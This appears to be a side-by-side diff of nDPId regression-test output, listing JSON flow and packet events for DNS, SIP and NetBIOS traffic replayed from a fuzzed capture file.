00230{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":136,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1120469830657} 00216{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":136,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1120469830657}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":137,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469831652,"flow_last_seen":1120469831652,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469831652,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2732,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":137,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469831652,"flow_last_seen":1120469831652,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469831652,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2732,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":137,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1120469831652,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469831652,"pkt":"ADBUADRWAODtAXq9CABFAABISiEAAIARTTDAqAECwKgBAQqsADUANM1AXNgBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":137,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1120469831652,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469831652,"pkt":"ADBUADRWAODtAXq9CABFAABISiEAAIARTTDAqAECwKgBAQqsADUANM1AXNgBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":137,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469831652,"flow_last_seen":1120469831652,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469831652,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2732,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":137,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469831652,"flow_last_seen":1120469831652,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469831652,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2732,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00414{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":138,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120469831652,"pkt":"MDBUADRWAODtAW69CABFAABIaiIAE4ARTS\/AqAECwKgBAQqsADUANM1AXNgBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00400{"packet_event_id":1,"packet_event_name":"packet","packet_id":138,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120469831652,"pkt":"MDBUADRWAODtAW69CABFAABIaiIAE4ARTS\/AqAECwKgBAQqsADUANM1AXNgBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
00230{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":138,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1120469833655} 00216{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":138,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1120469833655}
00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":139,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1120469835658,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469835658,"pkt":"ADBUADRWAODtAW69CABFAABIaiMAAIARTS7AqAECwKgBAQqsADUANM1AXNgBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":139,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1120469835658,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469835658,"pkt":"ADBUADRWAODtAW69CABFAABIaiMAAIARTS7AqAECwKgBAQqsADUANM1AXNgBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
00808{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":140,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120469633828,"flow_last_seen":1120469634840,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":79,"midstream":0,"thread_ts_msec":1120469835658,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2719,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00808{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":140,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120469633828,"flow_last_seen":1120469634840,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":79,"midstream":0,"thread_ts_msec":1120469835658,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2719,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":140,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469632829,"flow_last_seen":1120469632829,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1120469835658,"l3_proto":"ip4","src_ip":"192.114.1.2","dst_ip":"192.168.1.1","src_port":2719,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":140,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469632829,"flow_last_seen":1120469632829,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1120469835658,"l3_proto":"ip4","src_ip":"192.114.1.2","dst_ip":"192.168.1.1","src_port":2719,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
@@ -228,8 +228,8 @@
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":142,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469847667,"flow_last_seen":1120469847667,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120469847667,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2733,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":142,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469847667,"flow_last_seen":1120469847667,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120469847667,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2733,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":142,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1120469847667,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120469847667,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1Cq0ARz61yNiAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwmEb2NhbGhvc3QA"} 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":142,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1120469847667,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120469847667,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1Cq0ARz61yNiAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwmEb2NhbGhvc3QA"}
00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":142,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469847667,"flow_last_seen":1120469847667,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120469847667,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2733,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}} 00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":142,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469847667,"flow_last_seen":1120469847667,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120469847667,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2733,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}}
00979{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":143,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":509,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":509,"pkt_l4_len":0,"thread_ts_msec":1120469847667,"pkt":"ADBUADRWAODtAVK9CABFAAHvaiZJAIB4FxjAqAEC1PIhIxPEE8QB25tyUkVmSVNURVIgc2lZOnNpcC5jeWJlckdpdHkyZGsgU0lQLzIuMA0KVmlhOiBTSVAvMi4wL1VEUCAxOTIuMTZxJXMAMjticmFuY2g9ejloRzRiS25wMTIzNzU5MDYzLTQ2NGJjMWJiMTkyLjE2OC4xLjI7cpdvcnQNaUZyb206IDxzaXA6dm9pMTgwNjJAc2lwLmN5YmVyY2l0eS5kaz47dGFnPTc2MDY5ZTQNClRvOiA8c2lwOnZvaTE4MDYyQHNpcC5jeWJlcmNpdHkuZGs+QwpDYWxsLUlEOiA1NzgyMjI3MjktNDY2NWQ3NzVANTc4MjIyNzMyLTQ2NjVkNzcyDQpDb250YWOqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 00965{"packet_event_id":1,"packet_event_name":"packet","packet_id":143,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":509,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":509,"pkt_l4_len":0,"thread_ts_msec":1120469847667,"pkt":"ADBUADRWAODtAVK9CABFAAHvaiZJAIB4FxjAqAEC1PIhIxPEE8QB25tyUkVmSVNURVIgc2lZOnNpcC5jeWJlckdpdHkyZGsgU0lQLzIuMA0KVmlhOiBTSVAvMi4wL1VEUCAxOTIuMTZxJXMAMjticmFuY2g9ejloRzRiS25wMTIzNzU5MDYzLTQ2NGJjMWJiMTkyLjE2OC4xLjI7cpdvcnQNaUZyb206IDxzaXA6dm9pMTgwNjJAc2lwLmN5YmVyY2l0eS5kaz47dGFnPTc2MDY5ZTQNClRvOiA8c2lwOnZvaTE4MDYyQHNpcC5jeWJlcmNpdHkuZGs+QwpDYWxsLUlEOiA1NzgyMjI3MjktNDY2NWQ3NzVANTc4MjIyNzMyLTQ2NjVkNzcyDQpDb250YWOqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
00231{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":143,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":475,"global_ts_msec":1120469847669} 00217{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":143,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":475,"global_ts_msec":1120469847669}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":145,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469847979,"flow_last_seen":1120469847979,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469847979,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2734,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":145,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469847979,"flow_last_seen":1120469847979,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469847979,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2734,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":145,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1120469847979,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469847979,"pkt":"ADBUADRWAODtAW69CABFAABIaicAAIARTSrAqAECwKgBAQquADUANKw8fdoBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":145,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1120469847979,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469847979,"pkt":"ADBUADRWAODtAW69CABFAABIaicAAIARTSrAqAECwKgBAQquADUANKw8fdoBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":145,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469847979,"flow_last_seen":1120469847979,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469847979,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2734,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":145,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469847979,"flow_last_seen":1120469847979,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469847979,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2734,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
@@ -257,8 +257,8 @@
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":156,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120469681446,"flow_last_seen":1120469689458,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469865145,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2724,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":156,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120469681446,"flow_last_seen":1120469689458,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469865145,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2724,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00663{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":156,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469685131,"flow_last_seen":1120469685131,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120469865145,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":25481,"l4_proto":"udp","ndpi": {"confidence": {"1":"Match by port"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00663{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":156,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469685131,"flow_last_seen":1120469685131,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120469865145,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":25481,"l4_proto":"udp","ndpi": {"confidence": {"1":"Match by port"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":156,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469685131,"flow_last_seen":1120469685131,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120469865145,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":25481,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":156,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469685131,"flow_last_seen":1120469685131,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120469865145,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":25481,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00430{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":157,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":92,"pkt_l4_len":0,"thread_ts_msec":1120469875687,"pkt":"\/\/\/\/\/\/\/\/AODtAW69CABFAABPai8AAIARTB7AqAECwKgB\/wCJAIkAOluZhQIBEAABWQAAAAAAIEVGRURFSkZQRUVFUEVORUJFSkVPQ0FDQUNBQ0FDQWNNAAAgAAE="} 00416{"packet_event_id":1,"packet_event_name":"packet","packet_id":157,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":92,"pkt_l4_len":0,"thread_ts_msec":1120469875687,"pkt":"\/\/\/\/\/\/\/\/AODtAW69CABFAABPai8AAIARTB7AqAECwKgB\/wCJAIkAOluZhQIBEAABWQAAAAAAIEVGRURFSkZQRUVFUEVORUJFSkVPQ0FDQUNBQ0FDQWNNAAAgAAE="}
00230{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":157,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":58,"global_ts_msec":1120469876437} 00216{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":157,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":58,"global_ts_msec":1120469876437}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":158,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469877188,"flow_last_seen":1120469877188,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120469877188,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":169,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 